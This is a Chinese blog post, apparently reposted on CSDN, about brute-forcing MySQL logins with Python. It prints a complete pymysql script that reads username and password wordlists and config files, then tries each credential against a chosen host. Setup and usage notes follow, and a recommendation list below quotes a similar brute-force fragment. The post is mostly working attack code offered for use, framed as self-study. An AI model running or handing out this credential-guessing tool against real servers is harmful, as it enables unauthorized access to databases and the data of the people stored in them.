利用python爆破mysql数据库

最新推荐文章于 2024-05-29 14:49:27 发布
最新推荐文章于 2024-05-29 14:49:27 发布
阅读量3k 收藏 22
点赞数 19
文章标签: mysql 数据库 python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_52344654/article/details/121797566
版权

0x00

这几天学习了使用python去爆破mysql数据库。脚本转载连接:

python 构造mysql爆破器 - 东京$ - 博客园

脚本具体内容如下:

import pymysql
import optparse
import os
import configparser

def main():
    parser=optparse.OptionParser()
    parser.add_option('-u',dest='username',help='MySQL username of blasting')
    parser.add_option('-p',dest='password',help='MySQL password of blasting')
    parser.add_option('-a',action='store_true',dest='all',help='MySQL all of blasting')
    parser.add_option('-U',dest='zhidinusername',help='Configuration parameters for all: specify user dictionary')
    parser.add_option('-P',dest='zhidinpassword',help='Configuration parameters for all: specify password dictionary')
    (options,args)=parser.parse_args()
    if options.username:
        file=options.username
        usernamepo(file)
    elif options.password:
        file2=options.password
        passwordpo(file2)
    elif options.all and options.zhidinusername and options.zhidinpassword:
        un=options.zhidinusername
        pd=options.zhidinpassword
        allpo(un,pd)
    else:
        parser.print_help()
        exit()

def usernamepo(file):
    cx=open('{}'.format(file),'r')
    if os.path.exists('config.ini'):
        print('[+]Config.ini ok')
    else:
        print('[-]Config.ini Not Found')
        exit()

    print('[*]Read the configuration file information')
    cf=configparser.ConfigParser()
    cf.read('config.ini')
    host=cf.get('config','host')
    port=cf.get('config','port')
    password=cf.get('config','password')
    print('[/]-------Config.ini-------')
    print('[+]Host:{}'.format(host))
    print('[+]Port:{}'.format(port))
    print('[+]password{}'.format(password))

    print('[/]------User.txt----------')
    if os.path.exists(file):
        print('[+]User.txt ok')
    else:
        print('[-]User.txt Not Found')

    print('[/]------Mysql blasting------')
    for k in cx.readlines():
        try:
            db=pymysql.connect(host,k.strip(),password)
            print('[+]Mysql Username in {}'.format(k.strip()))
        except Exception as g:
            print('[-]Not Username:{},and Error{}'.format(k.strip(),g))


def passwordpo(file2):
    cx = open('{}'.format(file2), 'r')
    if os.path.exists('config.ini'):
        print('[+]Config.ini ok')
    else:
        print('[-]Config.ini Not Found')
        exit()

    print('[*]Read the configuration file information')
    cf = configparser.ConfigParser()
    cf.read('config2.ini')
    host = cf.get('config', 'host')
    port = cf.get('config', 'port')
    username = cf.get('config', 'username')
    print('[/]-------Config.ini-------')
    print('[+]Host:{}'.format(host))
    print('[+]Port:{}'.format(port))
    print('[+]username{}'.format(username))

    print('[/]------passwd.txt----------')
    if os.path.exists(file2):
        print('[+]Passwd.txt ok')
    else:
        print('[-]Passwd.txt Not Found')

    print('[/]------Mysql blasting------')
    for k in cx.readlines():
        try:
            db = pymysql.connect(host, username, k.strip())
            print('[+]Mysql Password in {}'.format(k.strip()))
        except Exception as g:
            print('[-]Not Password:{},and Error{}'.format(k.strip(), g))


def  allpo(un,pd):
    user=open('{}'.format(un),'r')
    passs=open('{}'.format(pd),'r')
    usern=[]
    passn=[]
    if os.path.exists(un):
        print('[+]Username.txt is ok')
    else:
        print('[-]Not Found username.txt')

    if os.path.exists(pd):
        print('[+]Password.txt is ok')
    else:
        print('[-]Not Found password.txt')

    if os.path.exists('config3.ini'):
        print('[+]Config3.ini ok')
    else:
        print('[-]Config3.ini Not Found')
        exit()

    cf=configparser.ConfigParser()
    print('[/---------cofnig3.ini-------]')
    cf.read('config3.ini')
    host=cf.get('config','host')
    print('[+]host:{}'.format(host))

    print('[/]------Mysql blasting------')
    for u in user.readlines():
        usern.append(u.strip())
    for y in passs.readlines():
        passn.append(y.strip())
    for g in range(0,len(usern)):
        try:
            dk=pymysql.connect(host,usern[g],passn[g])
            print('[+]Username:{} and password:{}'.format(usern[g],passn[g]))
        except Exception as p:
            print('[-]Not username:{} and password:{} and Error:{}'.format(usern[g],passn[g],p))


if __name__ == '__main__':
    main()

0x01

脚本的使用

因为我自己的python也学的很烂,所以这个脚本也只是大概理解。首先需要注意的点就是安装上面所需的库,其中pymsql的库不能安装最新版本,要安装0.9.2的版本,否则会出现以下报错:

这个报错就是说明参数的数量不能相对应上。

然后需要创建相对应的config.ini文件。文件内容如下:

[config]
host=要爆破的地址
port=3306
username=root
password=123456

首先地址和端口就不用说了,这里之所以添加username和password的原因就在于该脚本的所提供的功能:

这里看到,可以采用-p pass.txt指定密码爆破,-u user.txt指定用户名爆破,以及-a -U user.txt -P pass.txt同时指定用户名和密码来爆破。所以例如当指定密码爆破时,所采用的账户就是上述config.ini中填写的账户。

一定要注意,想要完整的运行此脚本,需要设置好config.ini、config1.ini、config2.ini以及pass.txt、user.txt。

0x02

下面就简要去爆破一个mysql试试:

 需要注意的一点就是,回显出来的IP地址和爆破的地址是不一样的,因为是从本机发出的请求去爆破,所以下方会显示本机的IP地址。而实际上还是去爆破在config.ini中设置好的ip。当密码正确时就会自动提示了。

0x03

以上内容均是个人理解,如果有不对的地方希望能够指点一二,感激不尽。

 

 

127.3o.1
关注
  • 19
    点赞
  • 22
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
Python3暴力破解Mysql(端口3306)
lieren123567的博客
11-10 542
固定端口3306,可自由设置线程数 """ 暴力破解Mysql """ import pymysql import multiprocessing import time def pymysql_connect(ip, mysql_user, mysql_password): try: # 连接数据库 db = pymysql.connect(host = ip, user = mysql_user, passwd=mysql_password, port=
python使用pymysql操作mysql数据库
hongliryan的专栏
01-23 2124
使用python调用pymysqlmysql进行连接并捕获相关的异常,及占位符的介绍。
Python 渗透测试:MySQL 数据库 弱密码测试.(3306 端口)
网络安全领域___专研者.
05-17 672
MySQL 是一种开源的关系型数据库管理系统(RDBMS)。它是目前世界上最流行的数据库之一,被广泛应用于各种类型的网站和应用程序中。MySQL 数据库爆破是一种非法和危险的黑客攻击手段。它指的是通过暴力猜测密码的方式,试图获取未授权访问 MySQL 数据库的行为。
弱口令-爆破Mysql
HAKUNAMATATATTA的博客
11-28 2088
mysql弱口令爆破工具 不仅仅是MySQL
Python开发:简单的密码爆破工具
最新发布
爱玩游戏的黑客的博客
05-29 1050
记得有大佬曾经说过:一个系统的突破往往是从弱口令开始,为了拿到弱口令我们就需要了解密码破解技术。密码破解主要分为离线密码破解和在线密码破解。在平时渗透时我们通常遇到的就是在线密码破解,破解对象包括各类系统服务以及各种网站应用,当我们面对rdp、ftp、ssh等服务,一般情况下可使用 hydra、超级弱口令爆破工具进行破解;而假如面对的是网站应用,最常用到的就是 BurpSuite、wfuzz。
mysql爆破python脚本
m0_73896875的博客
07-06 250
print(f"成功登录 - 主机名:{hostname},用户名:{username},密码:{password}")print(f"登录失败 - 主机名:{hostname},用户名:{username},密码:{password}")print(f"成功登录 - 主机名:{hostname},用户名:{username},密码:{password}")print(f"登录失败 - 主机名:{hostname},用户名:{username},密码:{password}")@Author :星之尘。
mysql数据库暴破
04-08
该资源为python编写的mysql暴力破解软件,采用多线程编写,爆破速度非常快。
python渗透测试】python渗透测试中的利用(完全版,持续中出)
人间体佐菲的博客
04-11 3602
下面的示例演示了如何使用Python socket模块编写自定义协议的实现:'utf-8'01'utf-8'在上述代码中,我们首先定义了一个handle_client()函数来处理客户端请求。该函数接收客户端套接字对象作为参数,并使用recv()方法接收客户端发送的数据。然后,它打印接收到的消息并使用send()方法发送响应。最后,它关闭客户端套接字以释放资源。服务器端首先创建一个套接字对象,并将其绑定到本地IP地址和端口。然后,它开始监听连接请求,并在while循环中等待客户端连接。
python连接mysql数据库示例代码
05-14
Python 连接 MySQL 数据库示例代码 内容概要 本资源提供了通过 Python 连接 MySQL 数据库的完整示例代码,旨在帮助读者理解如何在 Python 中使用 MySQL 数据库。代码示例包括数据库连接、创建表、插入数据、查询数据...
Python 操作 MySQL 数据库.docx
01-29
Python DB-API支持多种数据库,如GadFly、mSQL、MySQL、PostgreSQL、Microsoft SQL Server、Informix、Interbase、Oracle和Sybase等。要使用特定数据库,需要安装相应的DB-API模块,比如MySQLdb用于连接MySQL。 ...
Python连接Mysql数据库1
08-08
Python 连接 Mysql 数据库 Python 连接 Mysql 数据库Python 语言连接 Mysql 数据库的方法。在连接 Mysql 数据库之前,需要安装 MySQLdb, MySQLdb 是用于 Python 链接 Mysql 数据库的接口。有两种安装方法:一是...
Python操作mysql数据库
01-14
Python操作mysql数据库
PythonMySQL数据库操作.docx
07-27
PythonMySQL数据库操作-修改版 这是一个很简单且完全的对MySQL数据库进行操作的程序,希望能帮助到刚入门的朋友们。 一个程序与数据库进行交互的步骤: 1.和数据库建立连接 2.执行sql语句,接收返回值 3.关闭数据库...
python渗透库大集合
独爱米粒
12-02 385
l Scapy:一款强大的交互式数据报分析工具,可用作发送、嗅探、解析和伪造网络数据包。 l pypcap、Pcapy和pylibpcap:配合libpcap一起使用的数据包捕获模块 l libdnet:底层网络工具,含接口查询和以太网帧传输等功能 l dpkt:可以快速简单地创建或解析数据包 l Impacket:制作和解码网络数据包,支持NMB和SMB等高级协议 l pynids:封...
JeePlus快速开发平台-validateMobile接口存在SQL注入漏洞_jeeplus快速开发平台 漏洞(1)
2301_77033340的博客
04-15 373
【代码】JeePlus快速开发平台-validateMobile接口存在SQL注入漏洞_jeeplus快速开发平台 漏洞(1)
Python实现接口遍历爆破
AlvisLee的博客
03-30 345
Python实现接口遍历爆破
mysql弱密码爆破利用方法
m0_75198157的博客
04-08 924
inux kali2021中已经安装了mysql,所以可以在终端中使用mysql命令登录。在windows中,如果安装了mysql,在mysql/bin/mysql.exe。3、利用我们爆破出的用户名和密码,使用mysql客户端登录远程mysql服务器。需要在mysql服务器上开启写入文件的权限。这个变量默认的值是空值,表示不允许写入。
python实现打开文件的密码破解,且展示破解密码
m0_68174024的博客
05-15 1886
实现pdf文档的解密PDF破解的方法有很多,python的pypdf也是其中之一,破解编辑密码是比较简单的,但往往最难的是破解打开密码,目前只能用词典库去查找比对,时代在进步,破解和反破解都会进步,所以也没有绝对的说法,只有说“人生苦短,努力学习吧!
服务器python连接mysql数据库
05-15
服务器Python连接MySQL数据库的过程需要以下几个步骤。 首先,需要安装PythonMySQL驱动程序。Python的安装可以通过官网下载并按照指引完成安装,MySQL驱动可以使用Python的"pip"指令来安装。安装完成后,就可以在...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值